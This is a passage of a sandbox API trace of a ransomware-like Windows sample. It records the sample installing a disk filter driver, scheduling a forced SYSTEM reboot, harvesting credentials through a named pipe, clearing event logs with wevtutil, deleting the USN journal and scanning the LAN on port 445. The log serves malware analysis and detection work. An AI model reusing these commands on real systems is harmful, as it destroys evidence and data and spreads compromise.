dwProcessId=0x998, dwThreadId=0x99c)) returned 1 [0017.328] Sleep (dwMilliseconds=0x0) [0017.382] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x31c688 [0017.384] CreateServiceW (in: hSCManager=0x31c688, lpServiceName="cscc", lpDisplayName="Windows Client Side Caching DDriver", dwDesiredAccess=0xf01ff, dwServiceType=0x1, dwStartType=0x0, dwErrorControl=0x3, lpBinaryPathName="cscc.dat", lpLoadOrderGroup="Filter", lpdwTagId=0x0, lpDependencies="FltMgr", lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x2b2228 [0017.430] CloseServiceHandle (hSCObject=0x2b2228) returned 1 [0017.430] CloseServiceHandle (hSCObject=0x31c688) returned 1 [0017.430] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\Class\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}", phkResult=0x18f010 | out: phkResult=0x18f010*=0x158) returned 0x0 [0017.430] RegQueryValueExW (in: hKey=0x158, lpValueName="LowerFilters", lpReserved=0x0, lpType=0x18f00c, lpData=0x18e80c, lpcbData=0x18f020*=0x800 | out: lpType=0x18f00c*=0x7, lpData=0x18e80c*, lpcbData=0x18f020*=0x22) returned 0x0 [0017.430] RegSetValueExW (in: hKey=0x158, lpValueName="LowerFilters", Reserved=0x0, dwType=0x7, lpData=0x18e80c*, cbData=0x2c | out: lpData=0x18e80c*) returned 0x0 [0017.431] RegFlushKey (hKey=0x158) returned 0x0 [0017.439] RegCloseKey (hKey=0x158) returned 0x0 [0017.439] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E965-E325-11CE-BFC1-08002BE10318}", phkResult=0x18f010 | out: phkResult=0x18f010*=0x158) returned 0x0 [0017.439] RegQueryValueExW (in: hKey=0x158, lpValueName="UpperFilters", lpReserved=0x0, lpType=0x18f00c, lpData=0x18e80c, lpcbData=0x18f020*=0x800 | out: lpType=0x18f00c*=0x0, lpData=0x18e80c*=0x63, lpcbData=0x18f020*=0x800) returned 0x2 [0017.439] RegSetValueExW (in: hKey=0x158, lpValueName="UpperFilters", Reserved=0x0, dwType=0x7, lpData=0x18e80c*, cbData=0xc | out: lpData=0x18e80c*) returned 0x0 [0017.439] RegFlushKey (hKey=0x158) returned 0x0 [0017.462] RegCloseKey (hKey=0x158) returned 0x0 [0017.462] GetVersion () returned 0x1db10106 [0017.462] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control\\CrashControl", phkResult=0x18f010 | out: phkResult=0x18f010*=0x158) returned 0x0 [0017.462] RegQueryValueExW (in: hKey=0x158, lpValueName="DumpFilters", lpReserved=0x0, lpType=0x18f00c, lpData=0x18e80c, lpcbData=0x18f020*=0x800 | out: lpType=0x18f00c*=0x7, lpData=0x18e80c*, lpcbData=0x18f020*=0x1a) returned 0x0 [0017.462] RegSetValueExW (in: hKey=0x158, lpValueName="DumpFilters", Reserved=0x0, dwType=0x7, lpData=0x18e80c*, cbData=0x24 | out: lpData=0x18e80c*) returned 0x0 [0017.463] RegFlushKey (hKey=0x158) returned 0x0 [0017.501] RegCloseKey (hKey=0x158) returned 0x0 [0017.502] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xd581e0 | out: lpWSAData=0xd581e0) returned 0 [0017.511] CommandLineToArgvW (in: lpCmdLine="15", pNumArgs=0x18f448 | out: pNumArgs=0x18f448) returned 0x2a7d48*="15" [0017.511] StrToIntW (lpSrc="15") returned 15 [0017.511] LocalFree (hMem=0x2a7d48) returned 0x0 [0017.511] GetTickCount () returned 0x141a1 [0017.511] NetServerGetInfo (in: servername=0x0, level=0x65, bufptr=0x18f43c | out: bufptr=0x18f43c) returned 0x0 [0017.512] NetApiBufferFree (Buffer=0x31b498) returned 0x0 [0017.512] GetLocalTime (in: lpSystemTime=0x18f410 | out: lpSystemTime=0x18f410*(wYear=0x7e1, wMonth=0xa, wDayOfWeek=0x4, wDay=0x1a, wHour=0x2, wMinute=0x10, wSecond=0x2b, wMilliseconds=0x8a)) [0017.512] GetTickCount () returned 0x141a1 [0017.512] GetSystemDirectoryW (in: lpBuffer=0x18edf8, uSize=0x30c | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0017.512] PathAppendW (in: pszPath="C:\\Windows\\system32", pMore="shutdown.exe /r /t 0 /f" | out: pszPath="C:\\Windows\\system32\\shutdown.exe /r /t 0 /f") returned 1 [0017.512] wsprintfW (in: param_1=0x18e5f8, param_2="schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" | out: param_1="schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00") returned 110 [0017.512] wsprintfW (in: param_1=0x18d770, param_2="/c %ws" | out: param_1="/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00") returned 113 [0017.512] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18df70, nSize=0x30c | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.512] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e588*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e5cc | out: lpCommandLine="/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"C:\\Windows\\system32\\shutdown.exe /r /t 0 /f\" /ST 02:34:00", lpProcessInformation=0x18e5cc*(hProcess=0x180, hThread=0x17c, dwProcessId=0x9b0, dwThreadId=0x9b4)) returned 1 [0017.516] Sleep (dwMilliseconds=0x0) [0017.557] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x188 [0017.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd48a6f, lpParameter=0x188, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0017.557] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd477d1, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0017.558] GetCurrentProcess () returned 0xffffffff [0017.561] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76600000 [0017.561] GetProcAddress (hModule=0x76600000, lpProcName="IsWow64Process") returned 0x7661195e [0017.561] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18dda8 | out: Wow64Process=0x18dda8) returned 1 [0017.561] FindResourceW (hModule=0xd40000, lpName=0x2, lpType=0x6) returned 0xd590d8 [0017.561] LoadResource (hModule=0xd40000, hResInfo=0xd590d8) returned 0xd6020c [0017.561] LockResource (hResData=0xd6020c) returned 0xd6020c [0017.561] SizeofResource (hModule=0xd40000, hResInfo=0xd590d8) returned 0x7a5e [0017.562] GetTempFileNameW (in: lpPathName="C:\\Windows\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x18edc4 | out: lpTempFileName="C:\\Windows\\41D0.tmp" (normalized: "c:\\windows\\41d0.tmp")) returned 0x41d0 [0017.562] CoCreateGuid (in: pguid=0x18f430 | out: pguid=0x18f430*(Data1=0x2fdfcf81, Data2=0xbd74, Data3=0x41c3, Data4=([0]=0x91, [1]=0x15, [2]=0xf6, [3]=0x28, [4]=0x92, [5]=0x5c, [6]=0xc5, [7]=0x68))) returned 0x0 [0017.562] StringFromCLSID (in: rclsid=0x18f430*(Data1=0x2fdfcf81, Data2=0xbd74, Data3=0x41c3, Data4=([0]=0x91, [1]=0x15, [2]=0xf6, [3]=0x28, [4]=0x92, [5]=0x5c, [6]=0xc5, [7]=0x68)), lplpsz=0x18f444 | out: lplpsz=0x18f444*="{2FDFCF81-BD74-41C3-9115-F628925CC568}") returned 0x0 [0017.569] CreateFileW (lpFileName="C:\\Windows\\41D0.tmp" (normalized: "c:\\windows\\41d0.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0x190 [0017.569] WriteFile (in: hFile=0x190, lpBuffer=0x368258*, nNumberOfBytesToWrite=0xf378, lpNumberOfBytesWritten=0x18ddb4, lpOverlapped=0x0 | out: lpBuffer=0x368258*, lpNumberOfBytesWritten=0x18ddb4*=0xf378, lpOverlapped=0x0) returned 1 [0017.570] CloseHandle (hObject=0x190) returned 1 [0017.571] wsprintfW (in: param_1=0x18e5c4, param_2="\\\\.\\pipe\\%ws" | out: param_1="\\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}") returned 47 [0017.571] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd46ffe, lpParameter=0x18e5c4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x190 [0017.571] wsprintfW (in: param_1=0x18ddc4, param_2="\"%ws\" %ws" | out: param_1="\"C:\\Windows\\41D0.tmp\" \\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}") returned 69 [0017.571] CreateProcessW (in: lpApplicationName="C:\\Windows\\41D0.tmp", lpCommandLine="\"C:\\Windows\\41D0.tmp\" \\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f3dc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f420 | out: lpCommandLine="\"C:\\Windows\\41D0.tmp\" \\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}", lpProcessInformation=0x18f420*(hProcess=0x198, hThread=0x194, dwProcessId=0x9d4, dwThreadId=0x9d8)) returned 1 [0017.575] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xea60) returned 0x0 [0019.487] TerminateThread (hThread=0x190, dwExitCode=0x0) returned 1 [0019.487] CloseHandle (hObject=0x190) returned 1 [0019.487] CreateFileW (lpFileName="C:\\Windows\\41D0.tmp" (normalized: "c:\\windows\\41d0.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0x190 [0019.488] WriteFile (in: hFile=0x190, lpBuffer=0x368258*, nNumberOfBytesToWrite=0xf378, lpNumberOfBytesWritten=0x18ddb4, lpOverlapped=0x0 | out: lpBuffer=0x368258*, lpNumberOfBytesWritten=0x18ddb4*=0xf378, lpOverlapped=0x0) returned 1 [0019.489] CloseHandle (hObject=0x190) returned 1 [0019.490] DeleteFileW (lpFileName="C:\\Windows\\41D0.tmp" (normalized: "c:\\windows\\41d0.tmp")) returned 1 [0019.491] CoTaskMemFree (pv=0x31b498) [0019.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd4a1a9, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x190 [0019.491] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd4a333, lpParameter=0x2b5148, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f8 [0019.492] Sleep (dwMilliseconds=0x0) [0019.497] CryptAcquireContextW (in: phProv=0x18f444, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18f444*=0x3214a8) returned 1 [0019.543] CryptGenRandom (in: hProv=0x3214a8, dwLen=0x21, pbBuffer=0x18f564 | out: pbBuffer=0x18f564) returned 1 [0019.543] CryptReleaseContext (hProv=0x3214a8, dwFlags=0x0) returned 1 [0019.543] GetLogicalDrives () returned 0x4 [0019.543] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0019.543] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x31b498 [0019.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd46299, lpParameter=0x31b498, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x200 [0019.544] Sleep (dwMilliseconds=0xdbba0) [0030.248] wsprintfW (in: param_1=0x18f240, param_2="%wswevtutil cl %ws & " | out: param_1="wevtutil cl Setup & ") returned 20 [0030.248] wsprintfW (in: param_1=0x18f240, param_2="%wswevtutil cl %ws & " | out: param_1="wevtutil cl Setup & wevtutil cl System & ") returned 41 [0030.248] wsprintfW (in: param_1=0x18f240, param_2="%wswevtutil cl %ws & " | out: param_1="wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & ") returned 64 [0030.248] wsprintfW (in: param_1=0x18f240, param_2="%wswevtutil cl %ws & " | out: param_1="wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & ") returned 90 [0030.248] wsprintfW (in: param_1=0x18ea40, param_2="wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:" | out: param_1="wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:") returned 120 [0030.248] wsprintfW (in: param_1=0x18dbb8, param_2="/c %ws" | out: param_1="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:") returned 123 [0030.248] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18e3b8, nSize=0x30c | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0030.248] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e9d0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ea14 | out: lpCommandLine="/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:", lpProcessInformation=0x18ea14*(hProcess=0x270, hThread=0x26c, dwProcessId=0xa38, dwThreadId=0xa3c)) returned 1 [0030.252] Sleep (dwMilliseconds=0xbb8) [0033.279] wsprintfW (in: param_1=0x18e5d4, param_2="/c %ws" | out: param_1="/c schtasks /Delete /F /TN drogon") returned 33 [0033.281] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18edd4, nSize=0x30c | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0033.281] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c schtasks /Delete /F /TN drogon", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f3ec*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f430 | out: lpCommandLine="/c schtasks /Delete /F /TN drogon", lpProcessInformation=0x18f430*(hProcess=0x1cc, hThread=0x1c8, dwProcessId=0xa84, dwThreadId=0xa88)) returned 1 [0033.774] Sleep (dwMilliseconds=0x0) [0034.266] InitiateSystemShutdownExW (lpMachineName=0x0, lpMessage=0x0, dwTimeout=0x0, bForceAppsClosed=1, bRebootAfterShutdown=1, dwReason=0x80000000) returned 1 [0035.613] ExitProcess (uExitCode=0x0) Thread: id = 3 os_tid = 0x968 Thread: id = 8 os_tid = 0x9ac Thread: id = 11 os_tid = 0x9c8 [0017.612] GetSystemMetrics (nIndex=8192) returned 0 [0017.903] Sleep (dwMilliseconds=0x1f4) [0018.768] GetSystemMetrics (nIndex=8192) returned 0 [0018.768] Sleep (dwMilliseconds=0x1f4) [0019.281] GetSystemMetrics (nIndex=8192) returned 0 [0019.281] Sleep (dwMilliseconds=0x1f4) [0019.797] GetSystemMetrics (nIndex=8192) returned 0 [0019.797] Sleep (dwMilliseconds=0x1f4) [0020.334] GetSystemMetrics (nIndex=8192) returned 0 [0020.334] Sleep (dwMilliseconds=0x1f4) [0020.872] GetSystemMetrics (nIndex=8192) returned 0 [0020.872] Sleep (dwMilliseconds=0x1f4) [0021.403] GetSystemMetrics (nIndex=8192) returned 0 [0021.403] Sleep (dwMilliseconds=0x1f4) [0021.933] GetSystemMetrics (nIndex=8192) returned 0 [0021.933] Sleep (dwMilliseconds=0x1f4) [0022.448] GetSystemMetrics (nIndex=8192) returned 0 [0022.448] Sleep (dwMilliseconds=0x1f4) [0023.417] GetSystemMetrics (nIndex=8192) returned 0 [0023.417] Sleep (dwMilliseconds=0x1f4) [0023.961] GetSystemMetrics (nIndex=8192) returned 0 [0023.961] Sleep (dwMilliseconds=0x1f4) [0024.507] GetSystemMetrics (nIndex=8192) returned 0 [0024.507] Sleep (dwMilliseconds=0x1f4) [0025.069] GetSystemMetrics (nIndex=8192) returned 0 [0025.069] Sleep (dwMilliseconds=0x1f4) [0025.615] GetSystemMetrics (nIndex=8192) returned 0 [0025.615] Sleep (dwMilliseconds=0x1f4) [0026.165] GetSystemMetrics (nIndex=8192) returned 0 [0026.165] Sleep (dwMilliseconds=0x1f4) [0026.675] GetSystemMetrics (nIndex=8192) returned 0 [0026.675] Sleep (dwMilliseconds=0x1f4) [0027.225] GetSystemMetrics (nIndex=8192) returned 0 [0027.226] Sleep (dwMilliseconds=0x1f4) [0027.768] GetSystemMetrics (nIndex=8192) returned 0 [0027.768] Sleep (dwMilliseconds=0x1f4) [0028.298] GetSystemMetrics (nIndex=8192) returned 0 [0028.298] Sleep (dwMilliseconds=0x1f4) [0028.814] GetSystemMetrics (nIndex=8192) returned 0 [0028.814] Sleep (dwMilliseconds=0x1f4) [0029.361] GetSystemMetrics (nIndex=8192) returned 0 [0029.361] Sleep (dwMilliseconds=0x1f4) [0029.873] GetSystemMetrics (nIndex=8192) returned 0 [0029.873] Sleep (dwMilliseconds=0x1f4) [0030.413] GetSystemMetrics (nIndex=8192) returned 0 [0030.413] Sleep (dwMilliseconds=0x1f4) [0030.958] GetSystemMetrics (nIndex=8192) returned 0 [0030.958] Sleep (dwMilliseconds=0x1f4) [0032.005] GetSystemMetrics (nIndex=8192) returned 0 [0032.005] Sleep (dwMilliseconds=0x1f4) [0032.950] GetSystemMetrics (nIndex=8192) returned 0 [0032.950] Sleep (dwMilliseconds=0x1f4) [0033.659] GetSystemMetrics (nIndex=8192) returned 0 [0033.734] Sleep (dwMilliseconds=0x1f4) [0034.313] GetSystemMetrics (nIndex=8192) returned 0 [0034.313] Sleep (dwMilliseconds=0x1f4) [0035.197] GetSystemMetrics (nIndex=8192) returned 0 [0035.213] Sleep (dwMilliseconds=0x1f4) Thread: id = 12 os_tid = 0x9cc [0017.612] StrCmpIW (psz1="127.0.0.1", psz2="localhost") returned -1 [0017.613] StrCmpIW (psz1="127.0.0.1", psz2="0.0.0.0") returned 1 [0017.613] StrCmpIW (psz1="localhost", psz2="0.0.0.0") returned 1 [0017.613] GetComputerNameExW (in: NameType=0x4, lpBuffer=0x299f7dc, nSize=0x299f9e4 | out: lpBuffer="XDUWTFONO", nSize=0x299f9e4) returned 1 [0017.613] StrCmpIW (psz1="127.0.0.1", psz2="XDUWTFONO") returned -1 [0017.613] StrCmpIW (psz1="localhost", psz2="XDUWTFONO") returned -1 [0017.613] StrCmpIW (psz1="0.0.0.0", psz2="XDUWTFONO") returned -1 [0017.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd48b2e, lpParameter=0x2adc28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a0 [0017.613] CloseHandle (hObject=0x1a0) returned 1 [0017.613] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x749a0000 [0017.616] GetProcAddress (hModule=0x749a0000, lpProcName="GetExtendedTcpTable") returned 0x749b1a8a [0017.616] GetExtendedTcpTable (in: pTcpTable=0x2b10020, pdwSize=0x299f7bc, bOrder=0, ulAf=0x2, TableClass=0x1, Reserved=0x0 | out: pTcpTable=0x2b10020, pdwSize=0x299f7bc) returned 0x0 [0017.616] FreeLibrary (hLibModule=0x749a0000) returned 1 [0017.616] GetIpNetTable (in: IpNetTable=0x0, SizePointer=0x299f7c0, Order=0 | out: IpNetTable=0x0, SizePointer=0x299f7c0) returned 0x7a [0017.616] GetIpNetTable (in: IpNetTable=0x378958, SizePointer=0x299f7c0, Order=0 | out: IpNetTable=0x378958, SizePointer=0x299f7c0) returned 0x0 [0017.617] wsprintfW (in: param_1=0x299f770, param_2="%u.%u.%u.%u" | out: param_1="192.168.0.1") returned 11 [0017.617] StrCmpIW (psz1="127.0.0.1", psz2="192.168.0.1") returned -1 [0017.617] StrCmpIW (psz1="localhost", psz2="192.168.0.1") returned 1 [0017.617] StrCmpIW (psz1="0.0.0.0", psz2="192.168.0.1") returned -1 [0017.617] StrCmpIW (psz1="XDUWTFONO", psz2="192.168.0.1") returned 1 [0017.617] NetServerEnum (in: servername=0x0, level=0x65, bufptr=0x299f7b8, prefmaxlen=0xffffffff, entriesread=0x299f7b4, totalentries=0x299f7ac, servertype=0x80000000, domain=0x0, resume_handle=0x299f7b0 | out: bufptr=0x299f7b8, entriesread=0x299f7b4, totalentries=0x299f7ac, resume_handle=0x299f7b0) returned 0x17e6 [0031.404] Sleep (dwMilliseconds=0x2bf20) Thread: id = 13 os_tid = 0x9d0 [0017.634] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x2b13a0, dwRevision=0x1 | out: pSecurityDescriptor=0x2b13a0) returned 1 [0017.635] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2b13a0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x2b13a0) returned 1 [0017.635] CreateNamedPipeW (lpName="\\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}" (normalized: "\\device\\namedpipe\\{2fdfcf81-bd74-41c3-9115-f628925cc568}"), dwOpenMode=0x3, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x0, lpSecurityAttributes=0x2abf858) returned 0x1d0 [0017.635] ConnectNamedPipe (in: hNamedPipe=0x1d0, lpOverlapped=0x0 | out: lpOverlapped=0x0) returned 1 [0018.420] PeekNamedPipe (in: hNamedPipe=0x1d0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2abf868, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2abf868*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0018.420] Sleep (dwMilliseconds=0x3e8) [0019.454] PeekNamedPipe (in: hNamedPipe=0x1d0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2abf868, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2abf868*=0x52, lpBytesLeftThisMessage=0x0) returned 1 [0019.455] ReadFile (in: hFile=0x1d0, lpBuffer=0x2a9958, nNumberOfBytesToRead=0x52, lpNumberOfBytesRead=0x2abf864, lpOverlapped=0x0 | out: lpBuffer=0x2a9958*, lpNumberOfBytesRead=0x2abf864*=0x52, lpOverlapped=0x0) returned 1 [0019.464] StrChrW (lpStart="XDUWTFONO\\5p5NrGJn0jS HALPmcxz:6mnH7CdKK", wMatch=0x3a) returned=":6mnH7CdKK" [0019.465] FlushFileBuffers (hFile=0x1d0) returned 1 [0019.465] DisconnectNamedPipe (hNamedPipe=0x1d0) returned 1 [0019.486] CloseHandle (hObject=0x1d0) returned 1 [0019.486] CreateNamedPipeW (lpName="\\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}" (normalized: "\\device\\namedpipe\\{2fdfcf81-bd74-41c3-9115-f628925cc568}"), dwOpenMode=0x3, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x0, nInBufferSize=0x0, nDefaultTimeOut=0x0, lpSecurityAttributes=0x2abf858) returned 0x1d0 [0019.486] ConnectNamedPipe (hNamedPipe=0x1d0, lpOverlapped=0x0) Thread: id = 15 os_tid = 0x9dc [0017.853] GetAdaptersInfo (in: AdapterInfo=0x0, SizePointer=0x28ecad8 | out: AdapterInfo=0x0, SizePointer=0x28ecad8) returned 0x6f [0018.612] LocalAlloc (uFlags=0x40, uBytes=0x280) returned 0x380238 [0018.612] GetAdaptersInfo (in: AdapterInfo=0x380238, SizePointer=0x28ecad8 | out: AdapterInfo=0x380238, SizePointer=0x28ecad8) returned 0x0 [0018.624] inet_addr (cp="192.168.0.232") returned 0xe800a8c0 [0018.625] inet_addr (cp="255.255.255.0") returned 0xffffff [0018.625] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3803e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0018.625] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3803e8, cbMultiByte=-1, lpWideCharStr=0x37f580, cchWideChar=14 | out: lpWideCharStr="192.168.0.232") returned 14 [0018.625] StrCmpIW (psz1="127.0.0.1", psz2="192.168.0.232") returned -1 [0018.625] StrCmpIW (psz1="localhost", psz2="192.168.0.232") returned 1 [0018.625] StrCmpIW (psz1="0.0.0.0", psz2="192.168.0.232") returned -1 [0018.625] StrCmpIW (psz1="XDUWTFONO", psz2="192.168.0.232") returned 1 [0018.625] StrCmpIW (psz1="192.168.0.1", psz2="192.168.0.232") returned -1 [0018.625] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x380438, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0018.625] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x380438, cbMultiByte=-1, lpWideCharStr=0x2b13c0, cchWideChar=12 | out: lpWideCharStr="192.168.0.1") returned 12 [0018.625] StrCmpIW (psz1="127.0.0.1", psz2="192.168.0.1") returned -1 [0018.625] StrCmpIW (psz1="localhost", psz2="192.168.0.1") returned 1 [0018.625] StrCmpIW (psz1="0.0.0.0", psz2="192.168.0.1") returned -1 [0018.625] StrCmpIW (psz1="XDUWTFONO", psz2="192.168.0.1") returned 1 [0018.625] StrCmpIW (psz1="192.168.0.1", psz2="192.168.0.1") returned 0 [0018.625] NetServerGetInfo (in: servername=0x0, level=0x65, bufptr=0x28ecab4 | out: bufptr=0x28ecab4) returned 0x0 [0018.641] NetApiBufferFree (Buffer=0x31b4f0) returned 0x0 [0018.641] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x37fde0 [0018.641] inet_addr (cp="255.255.255.255") returned 0xffffffff [0018.641] htonl (hostlong=0xa8c0) returned 0xc0a80000 [0018.641] htonl (hostlong=0xff00a8c0) returned 0xc0a800ff [0018.641] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd48ab3, lpParameter=0x37fde0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec [0018.642] CloseHandle (hObject=0x1ec) returned 1 [0018.642] LocalFree (hMem=0x380238) returned 0x0 Thread: id = 31 os_tid = 0xa00 [0018.646] htonl (hostlong=0xc0a80000) returned 0xa8c0 [0018.646] socket (af=2, type=1, protocol=0) returned 0x1ec [0018.874] htons (hostshort=0x1bd) returned 0xbd01 [0018.874] ioctlsocket (in: s=0x1ec, cmd=-2147195266, argp=0x2bcfa24 | out: 